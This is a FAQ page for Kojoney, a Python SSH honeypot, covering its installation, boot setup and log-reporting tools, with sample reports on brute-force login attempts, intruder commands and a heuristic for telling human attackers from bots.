Kojoney - A Honeypot for the SSH Service (Logo by Bollofino)Kojoney - A honeypot for the SSH Service

What is kojoney?

Kojoney is a low level interaction honeypot that emulates an SSH server. The daemon is written in Python using the Twisted Conch libraries.

Why the name kojoney?

Kojoney is a mix of the spanish word cojon (s/c/k/) and honey. In the spanish language the sentence "estar hasta los cojones" is used to express that you are cloyed. In the past I received many attacks against my SSH server and various of the attacks were very cool (i.e. using my name and sourname to brute force my SSH Server). In order to catch my attacker I decided to create a honeypot. The attacker stopped his offensives and (currently) I don't known who were the attacker but I realized of which this tool was very cool and I decided to release it to the public.

Who is the author of kojoney?

Me :) The author of the project is -officially- Jose Antonio Coret (please, for the love of god, Joxean), also known as Joxean Koret. You can contact me at joxeankoret N0SP4M at n0$p4m yah00 D0T es.

Which is the license of kojoney?

Kojoney is released under the GNU General Public License version 2 (the GPL).

Does it works under Win32?

Yes, I have been tested it under Cygwin and with ActiveState Python in my work but due to the lack of a Windows machine at home no packages have been released for M$ Windows environments.

Any volunteer?

In fact, Kojoney should work under any Python supported plattform. Please, take a look at the following location to view if your operating system is supported (Any COMMON operative system in which Python is not supported yet?).

I found a bug!

If you have been found a bug in Kojoney, please report it here. If the bug is a security bug, don't heasitate and contact me privately to my e-mail address joxeankoret N0SP4M at n0$p4m yah00 D0T es.

Where can I download the source of kojoney?

Follow the above link.

Download

Dependencies

In order to run kojoney you need to meet various prerequisites (dependencies, if you prefer). The following is a list of the currently known prerequisites:

And there are other various optional prerequisites. The following is the list of optional prerequisites (strongly recommended anyway):

Installing Kojoney

You don't need to install it. You can untar (or unzip) the package kojoney-XXX.tar.gz and execute the Python script 'kojoney.py', but you will need to have (or install manually) the prerequisites listed above.

Anyway, the recommended way is to install it and, if you want to install it you can use the supplied install script called INSTALL.sh.

Installing Kojoney with the install script


To install kojoney using the the install script follow these steps:

  • Install all the prerequisites (listed in previous paragraphs).
  • Download the latest kojoney package. Currently kojoney-0.0.3.2.zip (or a previous version).
  • Copy it to a temporary directory (i.e. /tmp/kojoney)
  • Un(zip|tar) the package
$ tar -xvzf kojoney-0.0.3.1.tar.gz (or unzip kojoney-0.0.3.2.zip)
(...)
$ ls
kojoney  kojoney-0.0.3.1.tar.gz
  • Enter in to the 'kojoney' directory, and (as root user if is an unix like OS) type "sh INSTALL.sh". 
  • Follow the wizard.
The following is a sample (correct) installation using INSTALL.sh:

$ su
password:
# sh INSTALL.sh
Kojoney Honeypot installer.

Press enter to view the license agreement ...
<<< NOTE: After read the license agreement press 'q' to exit >>>
Do you accept the ZPL, MIT and GPL license terms (yes/no) ?
yes
All licenses accepted.
******************************************
 Kojoney Honeypot Installer version 0.0.3
******************************************

Step 1 - Copying files
    (... uninteresting information...)
Step 2 - Building libraries
 [+] Building and installing [IP-Country]
 [+] Building and installing [Geograpy-Countries]
 [+] Building and installing [Zope Interfaces]
 [+] Building and installing [Twisted extension]
 [+] Building and installing [PyCrypto]
    (... Possibly various warnings. You can ignore these safely...)
 [+] Building and installing [Twisted Conch extension]
Step 3 - Installing documentation
 [+] Installing man pages
Step 4 - Changing permissions and creating symbolic links
 [+] Creating symlinks

Step 5 - Final questions and fun

Do you want to run it automatically at boot time (yes/no)?
yes

***No run levels were assigned. You need to do this manually.***

Do you want to run it now (yes/no)?
yes
Starting daemon


Kojoney installation finished.



And how can I uninstall it?

To uninstall it use the script called UNINSTALL.sh distributed with the kojoney package.

How can I start the daemon?

With no installation simply enter in the generated kojoney directory and type at the shell prompt "./kojoney.py". But, remember that you will need to have the prerequisites.

And how can I start it automatically at boot time?

In order to start automatically it at boot time you need to install kojoney with the script INSTALL.sh. When the installer asks you whether you want to run it automatically or not at boot time answer yes. This will copy the startup script kojoney in the /etc/init.d directory.

Now, assign in which run levels you want to run this. This is distribution dependent but explained bellow.

How can I start kojoney automatically in Debian?

After a successfull installation of kojoney type the following commands as root in a terminal:

# ln -s /etc/init.d/kojoney /etc/rc2.d
# ln -s /etc/init.d/kojoney /etc/rc3.d
# ln -s /etc/init.d/kojoney /etc/rc5.d

How can I start kojoney automatically in Redhat?

After a successfull installation of kojoney type the following commands as root in a terminal:

# /sbin/chkconfig --level 345 kojoney on

Where is the kojoney log file?

By default kojoney daemon output will be redirected to the file /var/log/honeypot.log.

How can I generate activity reports?

Use the commands 'kojreport' and 'kojreport-filter' as follow:

# kojreport /var/log/honeypot.log 0 0 1 > /tmp/report.txt

If you only want to generate a report for one IP address or for an specific date use the command 'kojreport-filter' as follow:

# kojreport-filter /var/log/honeypot.log '<desired ip address or date>' 0 0 1

Where is the report utility documentation?

If you have installed it using the install script you can view the documentation of kojreport and kojreport-filter by typing in a terminal man kojreport or man kojreport-filter.

Otherwise, in the doc/html directory of the kojoney package you will found the html versions of the man pages.

You can also view the html versions of the man pages online:

Any example reports, please?

The following is a real plain text sample report.


I like reports with graphic and pies

I will write a new report generator utility that creates HTML reports with graphics and pies. Or maybe another person will create a PHP frontend for it... Maybe...

I wana view more reports!

Take a look to the following big report: big-report.

Uh! The reporting tool recognizes humans!?

Yes, it does. But, of course, not all the times.

How is possible to recognize if a session was opened by a bot or by a human?

We, the humans, are clumsy. The script seeks for SUPR and BACKSPACE characters in the executed commands.

The script also checks if the intruder tried to change the window size or tried to forward X11 requests.

Using kojhumans, the tool to differ between humans and bots.

As of Kojoney v0.0.2 the tool kojhumans is distributed with the package. The syntax of this tool is as follow:

$ /usr/share/kojoney/kojhumans <logfile> {--by-session|--by-ip}

The following is the result of running the tool against my home log file:

/usr/share/kojoney/kojhumans /var/log/honeypot.log --by-ip
Human detected at 127.0.0.1 (**, Intranet address)
Human detected at 82.77.71.107 (RO, Romania)

2 human(s) total

/usr/share/kojoney/kojhumans /var/log/honeypot.log --by-session
Session with id 0 opened by a human
Session with id 5 opened by a human
Session with id 1682 opened by a human

3 human session(s) total

To search for an specific session data refer to the section called How to search for an specific session data?.

What username/password combinations are allowed to connect to the honeypot?

The most widely used username and password combinations. You can view and/or edit the credentials stored in the file /etc/kojoney/fake_users (if you have been installed it using the installer) or by editing the file fake_users distributed with the kojoney package.

How to search for an specific session?

To search for an specific session you need to use the tool kojsession (distributed as of kojoney 0.0.2). The followings are example of uses:

$ /usr/share/kojoney/kojsession /var/log/honeypot.log -total
7258 session(s)

Ok, there are a total of 7258 sessions in our log file. Sessions are sequential, so the logged sessions will have id 0, 1, 3, 4, etc... In this example we will look a session opened by a human. The session has id 1682 so the command that we need to run is as follows

$ /usr/share/kojoney/kojsession /var/log/honeypot.log 1682

This will output a report for the session 1682, as we can see bellow:

Kojoney Honeypot Report
-----------------------

Date: lun 01 ago 2005 23:56:15 CEST
Log lines: 31
Log size: 4,0K /tmp/tmp.6pM2Df

Authenticated users. Successfull logons
---------------------------------------

      1 ftp

Total 1

Logons with null passwords
--------------------------

      1 ftp

Total 1

Logons with or without password
-------------------------------

      2 ftp
      1 tiffany

Total 3

X11 forward requests
--------------------
Total 0

Executed different commands
---------------------------

      2 id
      1 whoami
      1 w
      1 uptime
      1 ls -a
      1 cd home

Total 7

Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------
Total 1

IP Addresses
------------

   1    82.77.71.107 - 1 conexion(es)

Total 1

Sessions opened by humans
-------------------------
Session with id 1682 opened by a human

1 human session(s) total

Humans detecteds by IP
----------------------
Human detected at 82.77.71.107 (RO, Romania)

1 human(s) total

Internal Honeypot Errors
------------------------
Total 0


What information we collect?
  1. We known that the attacker was enter into our honeypot by using the username and password combination ftp/ftp
  2. He or she also tried to logon with the user ftp and with no password, and also with the username tiffany.
  3. He or she tried to execute the commands "id" (two times), "whoami", "w", "uptime", "ls -a" and "cd home". 
  4. The intruder changed the remote terminal window size during the intrussion (looking the log file in raw mode I found the attacker were using a simple xterm).
  5. The attacker were an human.
  6. The attacker comes from Romania, concretely around Craiova (thanks to the extremely cool tool xtraceroute).
Is not cool this reporting tool? :)

How to search for an specific IP address?

As of kojreport 0.0.2 you can use the tool kojreport-filter. The syntax of the tool is the same as the kojreport tool but changing the second parameter. The following is the syntax of the kojreport-filter utility:

$ kojreport-filter <log file> <filter> <traceroute> <nmap> <country resolution>

And the following is a sample report for the IP address 209.152.166.77:

Kojoney Honeypot Report
-----------------------

Date: mar 02 ago 2005 00:09:40 CEST
Log lines: 35679
Log size: 3,5M /tmp/tmp.JbRsEU

Authenticated users. Successfull logons
---------------------------------------

      2 root
      2 admin
      1 webmaster
      1 web
      1 user
      1 test
      1 oracle
      1 mysql
      1 guest
      1 administrator

Total 12

Unauthenticated users. Failed logons
------------------------------------
Total 0

Users successfully authenticateds with publickey
------------------------------------------------
Total 0

Users unsuccessfully authenticateds with publickey
--------------------------------------------------
Total 0

Logons with null passwords
--------------------------
Total 0

Logons with or without password
-------------------------------

   3421 root
     11 admin
     11 adam
     10 ellen
      9 ronald
      9 paul
      9 mail
      9 jack
      9 guest
      9 francis
      9 eric
      9 danny
      9 alex
      8 apple
      7 user
      7 adrian
      6 white
      6 webster
      6 viper
(...about 1400 other username/password combinations..)
      1 dakota
      1 Christ
      1 chicago
      1 arbgirl_phpbb1
      1 apple1
      1 alan
      1 absurdir_deadphp

Total 5070

Number of times a remote shell was opened
-----------------------------------------

Total 12

X11 forward requests
--------------------
Total 0

Executed different commands
---------------------------
Total 0

Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------
Total 0

IP Addresses
------------

   1    209.152.166.77 - 5093 conexion(es)

Total 1

IP Addresses and Countries
--------------------------

   1    209.152.166.77 - US, United States

Total 1

Sessions opened by humans
-------------------------
0 human session(s) total

Humans detecteds by IP
----------------------
0 human(s) total

Internal Honeypot Errors
------------------------
Total 0

This were clearly an automated attack launched by a bot from the United States.

How to search for an specific date and/or date range?

Use the same tool as in the previous section and as a filter specify a regular expression that matches your date range. In example:

$ kojreport-filter /var/log/honeypot.log '^2005/07/30' 0 0 1
Kojoney Honeypot Report
-----------------------

Date: mar 02 ago 2005 00:20:53 CEST
Log lines: 61066
Log size: 4,7M /tmp/tmp.MG7QZj

Authenticated users. Successfull logons
---------------------------------------

      3 root
      2 test
      2 admin
      1 webmaster
      1 web
      1 user
      1 oracle
      1 mysql
      1 guest
      1 administrator

Total 14

Unauthenticated users. Failed logons
------------------------------------

   3419 root
     11 adam
     10 ellen
      9 ronald
      9 paul
      9 mail
      9 jack
      9 francis
      9 eric
      9 danny
      9 alex
      9 admin
      8 guest
      8 apple
      7 adrian
      6 white
      6 webster
      6 viper
      6 user
      6 stephanie
      6 russ
      6 philip
      6 mike
      6 matt
      6 martin
      6 kayla
      6 jerry
      6 james
(...to many tries...)
      1 chicago
      1 arbgirl_phpbb1
      1 apple1
      1 alan
      1 administrator
      1 absurdir_deadphp

Total 5058

Logons with null passwords
--------------------------

      1 root

Total 1

Logons with or without password
-------------------------------

   3423 root
     11 admin
     11 adam
     10 ellen
      9 ronald
      9 paul
      9 mail
      9 jack
      9 guest
      9 francis
      9 eric
      9 danny
      9 alex
      8 apple
      7 user
      7 adrian
      6 white
      6 webster
      6 viper
      6 stephanie
      6 russ
      6 philip
      6 mike
      6 matt
(...and more combinatios again...)
      1 arbgirl_phpbb1
      1 apple1
      1 alan
      1 absurdir_deadphp

Total 5073

Number of times a remote shell was opened
-----------------------------------------
Total 14

X11 forward requests
--------------------
Total 0

Executed different commands
---------------------------
Total 0

Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------
Total 0

IP Addresses
------------

   1    209.152.166.77 - 5093 conexion(es)
   2    172.179.184.30 - 1 conexion(es)
   3    82.43.139.111 - 1 conexion(es)

Total 3

IP Addresses and Countries
--------------------------

   1    209.152.166.77 - US, United States
   2    172.179.184.30 - US, United States
   3    82.43.139.111 - GB, United Kingdom

Total 3

Sessions opened by humans
-------------------------
0 human session(s) total

Humans detecteds by IP
----------------------
0 human(s) total

Internal Honeypot Errors
------------------------
Total 0

At 2005/07/30 I received various (all automated) attacks from the United States and the United Kingdom, only 14 remote shells were opened and no one command were executed.

Where can I get more information about honeypots?

The following is a list of locations where you will find interesting information about honeypots:

Thanks

Thanks to Bollofino because of the good logo he truly made.
Thanks to Defero.tk because of the traductions and also for the good logo he made. (Don't take a look to http://defero.tk  :P).
Thanks to barrapunto.com.
Thanks to my f* confusions.
Thanks to my girlfriend because of the pacience. What a crudel life... Or not :)
Thanks to the savane people because of the CSS.
Thanks to the sourceforge.net people.

And, of course, thanks to all my attackers because of their disinterested help.

Do you want to view a live honeypot?